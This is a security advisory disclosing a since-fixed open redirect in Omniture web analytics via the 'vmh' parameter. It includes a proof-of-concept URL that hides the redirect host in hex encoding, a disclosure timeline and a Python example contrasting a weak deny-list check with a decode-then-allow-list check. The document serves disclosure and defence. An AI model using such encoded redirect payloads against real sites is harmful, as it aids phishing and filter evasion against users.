Advisory: Omniture web analytics - Open Redirection vulnerability

Advisory ID: SSCHADV2013-003
Author: Stefan Schurtz
Affected Software: Successfully tested on paypal.112.2o7.net
Vendor URL: http://www.omniture.com/
Vendor Status: fixed

==========================
Vulnerability Description
==========================

The 'vmh' parameter in Omniture web analytics is prone to an Open Redirection vulnerability: the value of the parameter is used as a redirect target without being validated against an allowed host list.

==========================
PoC-Exploit
==========================

// Redirection to darksecurity.de (Hex: %77%77%77%2E%64%61%72%6B%73%65%63%75%72%69%74%79%2E%64%65)
http://paypal.112.2o7.net/b/ss/paypalglobal/1/H.24.2/s44689267192652?AQB=1&pccr=true&g=none&&vmh=%77%77%77%2E%64%61%72%6B%73%65%63%75%72%69%74%79%2E%64%65&ndh=1&vmt=51437A79&ce=UTF-8&cc=USD&v5=DE&c6=9WG20829AV167542H&c7=premier&v7=premier:verified:unrestricted&c8=verified&c9=unrestricted&c10=de&v19=premier&c20=1360528993&c26=submit.x&&c35=in&c40=a0df0db936e73&c43=log%20in&c47=D=pageName&c50=de_de&&c54=100&c56=no&s=1440x900&c=24&j=1.7&v=Y&k=Y&bw=1440&bh=675&&pid=log%20in&pidt=1&oid=Einloggen&oidt=3&ot=SUBMIT&AQE=1

==========================
Solution
==========================

Fixed by vendor

==========================
Disclosure Timeline
==========================

19-Feb-2013 - vendor informed via contact form
02-Mar-2013 - vendor informed by e-mail
04-Mar-2013 - feedback from vendor
04-Mar-2013 - sent detailed information to vendor
06-Mar-2013 - feedback from Adobe PRSIRT (Adobe Product Security Incident Response Team)
29-Apr-2013 - asked about the current status
02-May-2013 - feedback from Adobe PRSIRT (Adobe Product Security Incident Response Team)

==========================
Credits
==========================

Vulnerability found and advisory written by Stefan Schurtz.

==========================
References
==========================

http://www.omniture.com/de/privacy/2o7
http://www.darksecurity.de/advisories/2013/SSCHADV2013-003.txt
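The PoC above hides the redirect target behind percent-encoding, which is exactly what defeats a check that inspects the raw parameter value. The following is an added example (not code from the advisory or from the vendor) showing why a redirect-target check must decode before comparing and should use an allow-list of hosts rather than a deny-list; the allow-list, the shortened request URL and the helper names are constructed for illustration.

```python
from urllib.parse import urlsplit, unquote

# Constructed allow-list: the only hosts this collector is permitted to redirect to.
ALLOWED_REDIRECT_HOSTS = {"www.paypal.com", "paypal.com"}

# Constructed request URL that carries the hex-encoded 'vmh' value from the advisory.
POC_URL = ("http://paypal.112.2o7.net/b/ss/paypalglobal/1/H.24.2/s44689267192652"
           "?AQB=1&pccr=true&g=none&&vmh=%77%77%77%2E%64%61%72%6B%73%65%63%75%72"
           "%69%74%79%2E%64%65&ndh=1&ce=UTF-8&AQE=1")


def raw_vmh(url):
    """Return the 'vmh' value exactly as sent (still percent-encoded), or None."""
    for part in urlsplit(url).query.split("&"):
        if part.startswith("vmh="):
            return part[len("vmh="):]
    return None


def canonical_host(value):
    """Percent-decode until the value stops changing (covers double encoding),
    then lower-case it so that comparisons are exact."""
    decoded = value
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded.strip().lower()


def denylist_check(raw_value):
    """Weak pattern: substring match on the undecoded value. The hex-encoded
    PoC value does not contain the literal string, so this wrongly passes it."""
    return "darksecurity.de" not in raw_value


def allowlist_check(raw_value):
    """Hardened pattern: decode first, reject anything that is not a bare host
    name, then require exact membership in the allow-list."""
    host = canonical_host(raw_value)
    if not host or any(ch in host for ch in "/\\@:?#"):
        return False
    return host in ALLOWED_REDIRECT_HOSTS
```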